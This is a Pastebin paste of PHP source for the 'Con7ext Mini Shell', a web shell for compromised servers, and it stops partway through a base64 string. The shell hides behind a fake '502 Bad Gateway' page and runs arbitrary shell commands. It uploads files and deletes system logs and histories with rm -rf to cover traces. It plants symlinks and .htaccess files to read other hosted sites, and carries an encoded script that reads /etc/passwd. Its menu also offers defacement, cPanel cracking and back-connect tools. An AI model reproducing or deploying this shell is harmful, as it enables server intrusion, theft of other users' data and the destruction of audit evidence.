SHARE
TWEET

Con7ext Mini Shell Recoded [Work in php7]

ToKeiChun Apr 15th, 2019 (edited) 126 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. ######################################################
  3. #Title : Con7ext Mini Shell ( Con7ext Web Shell v.2 )#
  4. #Kelebihan : Biasanya Undetect di server yg auto apus#
  5. #shell                                               #  
  6. #Dilengkapi Dengan Bypass Tools                      #  
  7. #Backconnect Tools dengan 4 pilihan                  #
  8. ######################################################
  9. session_start();
  10. set_time_limit(0);
  11. error_reporting(0);
  12. $auth_pass = "2f3a4fccca6406e35bcf33e92dd93135"; // magic
  13. if(get_magic_quotes_gpc()) {    
  14. function VEstripslashes($array) {      
  15. return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array);   }  
  16. $_POST = VEstripslashes($_POST);
  17. $_COOKIE = VEstripslashes($_COOKIE); }
  18.  
  19.  
  20. function Login() {
  21.     die("
  22. <html>
  23. <head><title>502 Bad Gateway</title></head>
  24. <body bgcolor='white'>
  25. <center><h1>502 Bad Gateway</h1></center>
  26. <hr><center>nginx/1.12.1</center>
  27. <footer style=position:fixed; left:1px; right:0px; bottom:0px;>
  28. <form method=post>
  29. <input type=password name=pass style=color:white;margin:0;background-color:transparent;border:0px solid white;>
  30. </form></footer></body></html>");
  31. }
  32.  
  33. function VEsetcookie($k, $v) {
  34.     $_COOKIE[$k] = $v;
  35.     setcookie($k, $v);
  36. }
  37.  
  38. if(!empty($auth_pass)) {
  39.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  40.         VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  41.  
  42.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  43.         Login();
  44. }
  45. ?>
  46. <!DOCTYPE HTML>
  47. <HTML>
  48. <HEAD>
  49. <link href="" rel="stylesheet" type="text/css">
  50. <title>Con7ext Mini Shell</title>
  51.   <meta charset="utf-8">
  52.   <meta name="viewport" content="width=device-width, initial-scale=1">
  53.   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  54.   <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  55.   <style>
  56. @font-face {
  57.     font-family: 'ubuntu_monoregular';
  58. src: url(data:application/x-font-woff;charset=utf-8;base64,) format('woff');
  59.     font-weight: normal;
  60.     font-style: normal;
  61.  
  62. }
  63.  
  64. html {
  65. background:black;
  66.     color: #ffffff;
  67.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  68.  
  69.     font-size: 11px;
  70.     width: 100%;
  71.     }
  72.   .jancok {
  73.   display: inline-block;
  74.     padding: 3px 6px;
  75.     margin-bottom: 0;
  76.     font-size: 12px;
  77.    
  78.     border:1px solid #191919;
  79.     text-align: left;
  80.     white-space: nowrap;
  81. }
  82. #nav{position:fixed;z-index:999;top:0;width:100%;left:73%;
  83. }
  84. a.nav-fokus {display:block; width:auto; height:auto; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff;  border-bottom:1px solid #fff;  padding:5px 8px; text-align:center; text-decoration:none; color:red; line-height:20px; overflow:hidden; float:left;
  85. }
  86. a.nav-fokus:hover {color:#FFFFFF; background:#191919; border-top:0px; border-left: 1px solid #fff; border-right:1px solid #fff;  border-bottom:1px solid #fff;
  87. }
  88. #menu a {
  89.      font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  90.      font-size: 12px;
  91.      background:#191919;
  92.      color:white;
  93.      margin:5px 2px 4px 2px;
  94.      padding:5px 8px;
  95.      border-color: cyan;
  96.      text-decoration:none;
  97.      letter-spacing:1px;
  98.      -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  99.        }
  100. #menu a:hover {
  101.      font-size: 12px;
  102.      background:#191919;-webkit-transform:rotate(0.0deg);-moz-transform:rotate(0.0deg);-ms-transform:rotate(0.0deg);-o-transform:rotate(0.0deg);transform:rotate(0.0deg);
  103.      color: white;
  104.      padding:5px 8px;
  105.      margin:1px;
  106.      border: 1px;
  107.      font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  108.      letter-spacing:1px;
  109.      margin:5px 2px 4px 2px;
  110.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  111.        }
  112.  
  113.  
  114. li {
  115.     display: inline;
  116.     margin: 1px;
  117.     padding: 1px;
  118. }
  119. .a_exp a:hover{
  120. text-decoration: underline;
  121. }
  122. textarea{
  123.         background:transparent;
  124.     border: 1px solid #2d2b2b;
  125.     width: 100%;
  126.     height: 400px;
  127.     padding-left: 5px;
  128.     margin: 10px auto;
  129.     font-family:Homenaje;
  130.     color: #ffffff;
  131.     font-size:13px;
  132. }
  133. input,select{
  134.     background:transparent;
  135.     color:white;
  136.     margin:0 10px;
  137.     font-family:Homenaje;
  138.     font-size:13px;
  139.     border:2px solid #2d2b2b;
  140. }
  141. li a{
  142. color:#fff;text-decoration: none;background:#333;padding:3px;margin:3px;
  143. }
  144. li a:hover{
  145. color:#fff;background:white;text-decoration: none;
  146. }
  147. thead{
  148. background:#333;color:#fff;
  149. }
  150. a:hover{
  151. text-decoration: underline;
  152. }
  153. .a_phpinfo{
  154. background:#000;color:#fff;border:1px solid #fff;text-align:center;
  155. }
  156. .a_phpinfo th,.a_phpinfo tr,.a_phpinfo td{
  157. border-collapse:collapse;border:1px solid white;
  158. }
  159. option{
  160. background:#000;color:white;border:0;}
  161. }
  162. .table_home, .td_home {
  163.     border: 1px solid #191919;
  164. }
  165. .table_home td:hover {
  166.     background: #191919;
  167. }
  168. .th_home {
  169.     font-family:ubuntu_monoregular;
  170.      font-size: 12px;
  171.      background:#191919;
  172.      color:white;
  173.      border-color: #191919;
  174.      text-decoration:none;
  175.      letter-spacing:2px;
  176. }
  177. table, th, td {
  178.     font-family:ubuntu_monoregular;
  179.     background: black;
  180.     font-size: 13px;
  181. }
  182. table{
  183. border: 1px #000000 dotted;
  184. }
  185. th {
  186.     padding: 10px;
  187. }
  188. a {
  189.     color: #ffffff;
  190.     text-decoration: none;
  191. }
  192. a:hover {
  193.     color: white;
  194.     text-decoration: underline;
  195.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  196.  
  197. }
  198. b {
  199.     color: white;
  200. }
  201. input[type=text], input[type=password],input[type=submit] {
  202.     background: transparent;
  203.     color:white;
  204.     margin:0 10px;
  205.     font-family:Homenaje;
  206.     font-size:13px;
  207.     border:2px solid #2d2b2b;
  208. }
  209. input[type=submit] {
  210.     background: transparent;
  211.     color:white;
  212.     margin:0 10px;
  213.     font-family:Homenaje;
  214.     font-size:13px;
  215.     border:2px solid #2d2b2b;
  216.  
  217. }
  218. option:hover {
  219. background:#000;color:white;border:0;}
  220.  
  221. }.a_exp{border:1px solid #fff;border-collapse: collapse;
  222. }
  223. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  224. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  225. .infoweb {
  226.     border-right: 1px solid #00FFFF;
  227. }
  228.     </style>
  229. </head>
  230.  
  231. <?php
  232. function w($dir,$perm) {
  233.     if(!is_writable($dir)) {
  234.         return "<font color=red>".$perm."</font>";
  235.     } else {
  236.         return "<font color=green>".$perm."</font>";
  237.     }
  238. }
  239. function exe($cmd) {
  240.     if(function_exists('system')) {        
  241.         @ob_start();       
  242.         @system($cmd);     
  243.         $buff = @ob_get_contents();        
  244.         @ob_end_clean();       
  245.         return $buff;  
  246.     } elseif(function_exists('exec')) {        
  247.         @exec($cmd,$results);      
  248.         $buff = "";        
  249.         foreach($results as $result) {         
  250.             $buff .= $result;      
  251.         } return $buff;    
  252.     } elseif(function_exists('passthru')) {        
  253.         @ob_start();       
  254.         @passthru($cmd);       
  255.         $buff = @ob_get_contents();        
  256.         @ob_end_clean();       
  257.         return $buff;  
  258.     } elseif(function_exists('shell_exec')) {      
  259.         $buff = @shell_exec($cmd);     
  260.         return $buff;  
  261.     }
  262. }
  263. function sulap($text) {
  264.   if(!get_magic_quotes_gpc()) {
  265.     return $text;
  266.     }
  267.   return stripslashes($text);
  268. }
  269. function GrabUrl($url,$type){
  270.  
  271.         $urlArray = array();
  272.  
  273.         $ch = curl_init();
  274.         curl_setopt($ch, CURLOPT_URL, $url);
  275.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  276.         $result = curl_exec($ch);
  277.  
  278.         $regex='|<a.*?href="(.*?)"|';
  279.         preg_match_all($regex,$result,$parts);
  280.         $links=$parts[1];
  281.         foreach($links as $link){
  282.             array_push($urlArray, $link);
  283.         }
  284.         curl_close($ch);
  285.  
  286.         foreach($urlArray as $value){
  287.             $lol="$url$value";
  288.             if(preg_match("#$type#is", $lol)) {
  289.                 echo "$lol\r\n";
  290.             }
  291.         }
  292. }
  293. function showdisablefunctions() {
  294.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  295.     else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  296. }
  297. function hdd($s) {
  298. if($s >= 1073741824)
  299. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  300. elseif($s >= 1048576)
  301. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  302. elseif($s >= 1024)
  303. return sprintf('%1.2f',$s / 1024 ) .' KB';
  304. else
  305. return $s .' B';
  306. }
  307. function ambilKata($param, $kata1, $kata2){
  308.     if(strpos($param, $kata1) === FALSE) return FALSE;
  309.     if(strpos($param, $kata2) === FALSE) return FALSE;
  310.     $start = strpos($param, $kata1) + strlen($kata1);
  311.     $end = strpos($param, $kata2, $start);
  312.     $return = substr($param, $start, $end - $start);
  313.     return $return;
  314. }
  315. function perms($file){
  316. $perms = fileperms($file);
  317. if (($perms & 0xC000) == 0xC000) {
  318. // Socket
  319. $info = 's';
  320. } elseif (($perms & 0xA000) == 0xA000) {
  321. // Symbolic Link
  322. $info = 'l';
  323. } elseif (($perms & 0x8000) == 0x8000) {
  324. // Regular
  325. $info = '-';
  326. } elseif (($perms & 0x6000) == 0x6000) {
  327. // Block special
  328. $info = 'b';
  329. } elseif (($perms & 0x4000) == 0x4000) {
  330. // Directory
  331. $info = 'd';
  332. } elseif (($perms & 0x2000) == 0x2000) {
  333. // Character special
  334. $info = 'c';
  335. } elseif (($perms & 0x1000) == 0x1000) {
  336. // FIFO pipe
  337. $info = 'p';
  338. } else {
  339. // Unknown
  340. $info = 'u';
  341. }
  342.  
  343. // Owner
  344. $info .= (($perms & 0x0100) ? 'r' : '-');
  345. $info .= (($perms & 0x0080) ? 'w' : '-');
  346. $info .= (($perms & 0x0040) ?
  347. (($perms & 0x0800) ? 's' : 'x' ) :
  348. (($perms & 0x0800) ? 'S' : '-'));
  349.  
  350. // Group
  351. $info .= (($perms & 0x0020) ? 'r' : '-');
  352. $info .= (($perms & 0x0010) ? 'w' : '-');
  353. $info .= (($perms & 0x0008) ?
  354. (($perms & 0x0400) ? 's' : 'x' ) :
  355. (($perms & 0x0400) ? 'S' : '-'));
  356.  
  357. // World
  358. $info .= (($perms & 0x0004) ? 'r' : '-');
  359. $info .= (($perms & 0x0002) ? 'w' : '-');
  360. $info .= (($perms & 0x0001) ?
  361. (($perms & 0x0200) ? 't' : 'x' ) :
  362. (($perms & 0x0200) ? 'T' : '-'));
  363.  
  364. return $info;
  365. }
  366. if(isset($_GET['dir'])) {
  367.     $dir = $_GET['dir'];
  368.     chdir($_GET['dir']);
  369. } else {
  370.     $dir = getcwd();
  371. }
  372. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  373. $dir = str_replace("\\","/",$dir);
  374. $sys = php_uname();
  375. $author = 'dmFsaXJ4YzBkZUB6b2hvLmNvbQ==';
  376. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  377. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  378. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  379. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  380. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  381. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  382. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  383. $getds = @ini_get("disable_functions");
  384. $ds = showdisablefunctions().' <font color=white>on</font> <font color=teal>'.php_sapi_name().'</font>';
  385. if(isset($_GET['path'])){
  386. $path = $_GET['path'];
  387. }else{
  388. $path = getcwd();
  389. }
  390. $path = str_replace('\\','/',$path);
  391. $paths = explode('/',$path);
  392. $home_r = $_SERVER['DOCUMENT_ROOT'];
  393. $contact = base64_decode($author);
  394. $_COPY = base64_decode($_c7e);
  395. if(get_magic_quotes_gpc()){
  396. foreach($_POST as $key=>$value){
  397. $_POST[$key] = stripslashes($value);
  398. }
  399. }
  400. if($_POST['upload']) {
  401.         if($_POST['tipe_upload'] == 'biasa') {
  402.             if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  403.                 $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  404.             } else {
  405.                 $act = "<font color=red>Failed to upload file</font>";
  406.             }
  407.         } else {
  408.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  409.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  410.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  411.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  412.                     $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  413.                 } else {
  414.                     $act = "<font color=red>Failed to upload file</font>";
  415.                 }
  416.             } else {
  417.                 $act = "<font color=red>Failed to upload file</font>";
  418.             }
  419.         }
  420.     }
  421.     echo "<center>Uploader :
  422.     <form method='post' enctype='multipart/form-data'>
  423.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  424.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  425.     <input type='file' name='ix_file'>
  426.     <input type='submit' value='upload' name='upload'>
  427.     </form>";
  428.     echo $act;
  429.  
  430. echo"
  431. <div id='menu'>
  432. <center>
  433. <ul>
  434. <a href='?path=$path&jancok=cmd'>Command</a>
  435. <a href='?path=$path&jancok=mass_deface'>Mass</a>
  436. <a href='?path=$path&jancok=adminer'>Adminer</a>
  437. <a href='?path=$path&jancok=jumping'>Jumping</a>
  438. <a href='?path=$path&jancok=cpanel'>Grab Cpanel</a>
  439. <a href='?path=$path&jancok=cgi'>Cgi Telnet</a>
  440. <a href='?path=$path&config=grabber'>Config Tools</a>
  441. <a href='?path=$path&mass=changer'>Mass User Changer</a>
  442. <a href='?path=$path&backconnect=tool'>Back Connect Tools</a>
  443. <a href='?path=$path&symlink=tool'>Symlink Tools</a>
  444. <a href='?path=$path&bypass=tool'>Bypass Tools</a></br></ul>
  445. <a href='?path=$path&jancok=loghunter'>Log Hunter</a>
  446. <a href='?path=$path&jancok=portsc'>Port Scanner</a>
  447. <a href='?path=$path&jancok=bconnect'>Simple Back-Connect</a>
  448. <a href='?path=$path&jancok=auto_wp_title'>Auto Edit Title WP</a>
  449. <a href='?path=$path&jancok=zip'>Zip Menu</a>
  450. <a href='?path=$path&jancok=cpbf'>Cpanel Cracker</a>
  451. </ul></div></center>";
  452. echo "<div id='nav'>
  453. <a class='nav-fokus' href='?'><b>Home</b></a><a class='nav-fokus' href='?path=$path&con7ext=info'><b>System Info</b></a><a class='nav-fokus' href='?path=$path&delete=logs'><b>Delete Logs</b></a><a class='nav-fokus' href='?path=$path&kill=self'><b>Kill Self</b></a><a class='nav-fokus' href='?path=$path&jancok=logout'><b>Log-Out</b></a></div>";
  454. echo '
  455. <br>
  456. <hr color="#191919">
  457. <br>
  458. <table width="700" align="center">
  459. <tr><td><font color="white">Current Path :</font>';
  460. foreach($paths as $id=>$pat){
  461. if($pat == '' && $id == 0){
  462. $a = true;
  463. echo '<a href="?path=/">/</a>';
  464. continue;
  465. }
  466. if($pat == '') continue;
  467. echo '<a href="?path=';
  468. for($i=0;$i<=$id;$i++){
  469. echo "$paths[$i]";
  470. if($i != $id) echo "/";
  471. }
  472. echo '">'.$pat.'</a>/';
  473. }
  474. echo '</td></tr>';
  475. echo '</table>';
  476. echo '<hr color="#191919"><br>';
  477. if($_GET['jancok'] == 'logout') {
  478. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  479.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  480.     echo 'Good Bye!!';
  481. } elseif($_GET['con7ext'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  482. }elseif($_GET['con7ext'] == 'info') {
  483. echo '<table width="600" border="600" align=center><tr><td>
  484. <center>
  485. System : '.$sys.'<br>
  486. HDD : '.hdd(disk_free_space("/")).' / '.hdd(disk_total_space("/")).'<br>
  487. IP : '.$ip.'<br>
  488. Safe Mode : '.$sm.'<br>
  489. Disabled Functions : '.$ds.'<br>
  490. MySQL : '.$mysql.' | Perl: '.$perl.' | Python: '.$python.' | WGET: '.$wget.' | CURL: '.$curl.'<br>
  491. Home_root : '.$home_r.'
  492. </center>
  493. </td></tr>
  494. </table>';
  495. } elseif($_GET['delete'] == 'logs') {
  496.     echo '<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>';
  497.     echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";      
  498.     exec("rm -rf /tmp/logs");
  499.     exec("rm -rf /root/.ksh_history");
  500.     exec("rm -rf /root/.bash_history");
  501.     exec("rm -rf /root/.bash_logout");
  502.     exec("rm -rf /usr/local/apache/logs");
  503.     exec("rm -rf /usr/local/apache/log");
  504.     exec("rm -rf /var/apache/logs");
  505.     exec("rm -rf /var/apache/log");
  506.     exec("rm -rf /var/run/utmp");
  507.     exec("rm -rf /var/logs");
  508.     exec("rm -rf /var/log");
  509.     exec("rm -rf /var/adm");
  510.     exec("rm -rf /etc/wtmp");
  511.     exec("rm -rf /etc/utmp");
  512.     exec("rm -rf $HISTFILE");
  513.     exec("rm -rf /var/log/lastlog");
  514.     exec("rm -rf /var/log/wtmp");
  515.  
  516.     shell_exec("rm -rf /tmp/logs");
  517.     shell_exec("rm -rf /root/.ksh_history");
  518.     shell_exec("rm -rf /root/.bash_history");
  519.     shell_exec("rm -rf /root/.bash_logout");
  520.     shell_exec("rm -rf /usr/local/apache/logs");
  521.     shell_exec("rm -rf /usr/local/apache/log");
  522.     shell_exec("rm -rf /var/apache/logs");
  523.     shell_exec("rm -rf /var/apache/log");
  524.     shell_exec("rm -rf /var/run/utmp");
  525.     shell_exec("rm -rf /var/logs");
  526.     shell_exec("rm -rf /var/log");
  527.     shell_exec("rm -rf /var/adm");
  528.     shell_exec("rm -rf /etc/wtmp");
  529.     shell_exec("rm -rf /etc/utmp");
  530.     shell_exec("rm -rf $HISTFILE");
  531.     shell_exec("rm -rf /var/log/lastlog");
  532.     shell_exec("rm -rf /var/log/wtmp");
  533.  
  534.     passthru("rm -rf /tmp/logs");
  535.     passthru("rm -rf /root/.ksh_history");
  536.     passthru("rm -rf /root/.bash_history");
  537.     passthru("rm -rf /root/.bash_logout");
  538.     passthru("rm -rf /usr/local/apache/logs");
  539.     passthru("rm -rf /usr/local/apache/log");
  540.     passthru("rm -rf /var/apache/logs");
  541.     passthru("rm -rf /var/apache/log");
  542.     passthru("rm -rf /var/run/utmp");
  543.     passthru("rm -rf /var/logs");
  544.     passthru("rm -rf /var/log");
  545.     passthru("rm -rf /var/adm");
  546.     passthru("rm -rf /etc/wtmp");
  547.     passthru("rm -rf /etc/utmp");
  548.     passthru("rm -rf $HISTFILE");
  549.     passthru("rm -rf /var/log/lastlog");
  550.     passthru("rm -rf /var/log/wtmp");
  551.  
  552.  
  553.     system("rm -rf /tmp/logs");
  554.     sleep(2);
  555.     echo'<br>Deleting .../tmp/logs ';
  556.     sleep(2);
  557.  
  558.     system("rm -rf /root/.bash_history");
  559.     sleep(2);
  560.     echo'<p>Deleting .../root/.bash_history </p>';
  561.  
  562.     system("rm -rf /root/.ksh_history");
  563.     sleep(2);
  564.     echo'<p>Deleting .../root/.ksh_history </p>';
  565.  
  566.     system("rm -rf /root/.bash_logout");
  567.     sleep(2);
  568.     echo'<p>Deleting .../root/.bash_logout </p>';
  569.  
  570.     system("rm -rf /usr/local/apache/logs");
  571.     sleep(2);
  572.     echo'<p>Deleting .../usr/local/apache/logs </p>';
  573.  
  574.     system("rm -rf /usr/local/apache/log");
  575.     sleep(2);
  576.     echo'<p>Deleting .../usr/local/apache/log </p>';
  577.  
  578.     system("rm -rf /var/apache/logs");
  579.     sleep(2);
  580.     echo'<p>Deleting .../var/apache/logs </p>';
  581.  
  582.     system("rm -rf /var/apache/log");
  583.     sleep(2);
  584.     echo'<p>Deleting .../var/apache/log </p>';
  585.  
  586.     system("rm -rf /var/run/utmp");
  587.     sleep(2);
  588.     echo'<p>Deleting .../var/run/utmp </p>';
  589.  
  590.     system("rm -rf /var/logs");
  591.     sleep(2);
  592.     echo'<p>Deleting .../var/logs </p>';
  593.  
  594.     system("rm -rf /var/log");
  595.     sleep(2);
  596.     echo'<p>Deleting .../var/log </p>';
  597.  
  598.     system("rm -rf /var/adm");
  599.     sleep(2);
  600.     echo'<p>Deleting .../var/adm </p>';
  601.  
  602.     system("rm -rf /etc/wtmp");
  603.     sleep(2);
  604.     echo'<p>Deleting .../etc/wtmp </p>';
  605.  
  606.     system("rm -rf /etc/utmp");
  607.     sleep(2);
  608.     echo'<p>Deleting .../etc/utmp </p>';
  609.  
  610.     system("rm -rf $HISTFILE");
  611.     sleep(2);
  612.     echo'<p>Deleting ...$HISTFILE </p>';
  613.  
  614.     system("rm -rf /var/log/lastlog");
  615.     sleep(2);
  616.     echo'<p>Deleting .../var/log/lastlog </p>';
  617.  
  618.     system("rm -rf /var/log/wtmp");
  619.     sleep(2);
  620.     echo'<p>Deleting .../var/log/wtmp </p>';
  621.  
  622.     sleep(4);
  623.  
  624.     echo '<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server';
  625.     echo"</td></tr></table>";
  626. } elseif($_GET['bypass'] == 'vhosts') {
  627.         echo "<div id='menu'><center><a href='?path=$path&bypass=disablefunc'>Disable Functions</a><a href='?path=$path&bypass=passwd'>Bypass /etc/passwd</a><a href='?path=$path&bypass=vhostss'>Bypass Vhosts</a></div>";
  628.     echo "<form method='POST' action=''>";
  629.     echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  630.     echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  631.         if (isset($_POST['Colii'])){
  632.                         mkdir('symvhosts', 0755);
  633.                         chdir('symvhosts');
  634.                         system('ln -s / Rintoar.txt');
  635.             $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  636.             $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  637.             $rt="<br><a href=symvhosts/Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  638.     Bypassed Successfully</b></font></a>";
  639.     echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";} echo "</form>";
  640. } elseif($_GET['jancok'] == 'cgi') {
  641.     $cgi_dir = mkdir('con7ext_cgi', 0755);
  642.         chdir('con7ext_cgi');
  643.     $file_cgi = "cgi.con7ext";
  644.         $memeg = ".htaccess";
  645.     $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext";
  646.     $htcgi = fopen(".htaccess", "w");
  647.     $cgi_script = "";
  648.     $cgi = fopen($file_cgi, "w");
  649.     fwrite($cgi, base64_decode($cgi_script));
  650.     fwrite($htcgi, $isi_htcgi);
  651.     chmod($file_cgi, 0755);
  652.         chmod($memeg, 0755);
  653.     echo "<br><center>Done ... <a href='con7ext_cgi/cgi.con7ext' target='_blank'>Klik Here</a>";
  654. }elseif($_GET['symlink'] == 'python') {
  655.     $sym_dir = mkdir('con7ext_sympy', 0755);
  656.         chdir('con7ext_sympy');
  657.     $file_sym = "sym.py";
  658.     $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHM